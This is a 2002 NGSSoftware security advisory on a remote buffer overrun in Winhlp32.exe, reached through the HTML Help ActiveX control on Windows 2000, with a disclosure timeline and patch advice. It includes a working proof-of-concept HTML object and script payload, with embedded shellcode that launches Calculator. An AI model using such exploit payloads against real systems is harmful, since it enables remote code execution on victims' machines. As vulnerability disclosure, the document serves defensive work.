-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
NGSSoftware Insight Security Research Advisory
Name: Winhlp32.exe Remote BufferOverrun Systems Affected: Win2K Platform Severity: Critical Category: Remote Buffer Overrun Vendor URL: http://www.mircosoft.com Author: Mark Litchfield (firstname.lastname@example.org) Date: 1st August 2002 Advisory number: #NISR01082002
Many of the features available in HTML Help are implemented through the HTML Help ActiveX control (HHCtrl.ocx). The HTML Help ActiveX control is used to provide navigation features (such as a table of contents), to display secondary windows and pop-up definitions, and to provide other features. The HTML Help ActiveX control can be used from topics in a compiled Help system as well as from HTML pages displayed in a Web browser. The functionality provided by the HTML Help ActiveX control will run in the HTML Help Viewer or in any browser that supports ActiveX technology, such as Internet Explorer (version 3.01 or later). Some features, as with the WinHlp Command, provided by the HTML Help ActiveX control are meant to be available only when it is used from a compiled HTML Help file (.chm) that is displayed by using the HTML Help Viewer.
Winhlp32.exe is vulnerable to a bufferoverrun attack using the Item parameter within WinHlp Command, the item parameter is used to specify the file path of the WinHelp (.hlp) file in which the WinHelp topic is stored, and the window name of the target window. Using this overrun, an attacker can successfully exectute arbitary code on a remote system by either encouraging the victim to visit a particular web page, whereby code would execute automatically, or by including the exploit within the source of an email. In regards to email, execution would automatically occur when the mail appears in the preview pane and ActiveX objects are allowed (This is allowed by default, the Internet Security Settings would have to be set as HIGH to prevent execution of this vulnerability). Any exploit would execute in the context of the logged on user.
Visual POC Exploit
This POC will simply display Calculator. Please note that this written on a Win2k PC with SP2 installed. I have not tested it on anything else.
<OBJECT classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11 codeBase=hhctrl.ocx#Version=4,72,8252,0 height=0 id=winhelp type=application/x-oleobject width=0><PARAM NAME="Width" VALUE="26"><PARAM NAME="Height" VALUE="26"><PARAM NAME="Command" VALUE="WinHelp"><PARAM NAME="Item1" VALUE="3ÀPhcalc4$ƒÀPV¸¯§éwÿÐ3ÀP¾”éwÿÖAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOP PPPQQQQRRRRSSSSTTTAAAA©õwABCDEFGHƒÆÿægMyWindow"><PARAM NAME="Item2" VALUE="NGS Software LTD"></OBJECT> <SCRIPT>winhelp.HHClick()</SCRIPT>
NGSSoftware alerted Microsoft to these problems on the 6th March 2002. NGSSoftware highly recommend installing Microsoft Windows SP3, as the fix has been built into this service pack found at http://www.microsoft.com An alternative to these patches would be to ensure the security settings found in the Internet Options is set to high. Despite the Medium setting, stating that unsigned ActiveX controls will not be downloaded, Kylie will still execute Calc.exe. Another alternative would be to remove winhlp32.exe if it is not required within your environment. A check for these issues has been added to Typhon II, of which more information is available from the NGSSoftware website, http://www.ngssoftware.com.
For further information about the scope and effects of buffer overflows, please see
http://www.ngssoftware.com/papers/non-stack-bo-windows.pdf http://www.ngssoftware.com/papers/ntbufferoverflow.html http://www.ngssoftware.com/papers/bufferoverflowpaper.rtf http://www.ngssoftware.com/papers/unicodebo.pdf
-----BEGIN PGP SIGNATURE----- Version: PGPfreeware 7.0.3 for non-commercial use <http://www.pgp.com>
iQA/AwUBPUnnf8a1CFAff8bXEQLz8gCgm4lbs5Fs2WUH5Au2cAkG0JQKKLMAn13p a+qSkYWrz7uspZcqqRTc2r0C =2PKN -----END PGP SIGNATURE-----